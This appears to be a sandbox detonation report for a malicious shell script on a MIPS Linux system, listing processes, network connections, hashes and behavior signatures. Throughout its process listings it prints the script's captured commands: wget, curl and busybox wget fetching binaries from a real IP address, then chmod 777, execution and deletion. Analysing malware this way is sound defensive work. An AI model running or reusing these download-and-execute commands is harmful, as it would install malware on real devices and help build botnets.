/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:26

Reported

2024-10-25 01:29

Platform

debian9-mipsel-20240418-en

Max time kernel

71s

Max time network

72s

Command Line

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A

Processes

/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

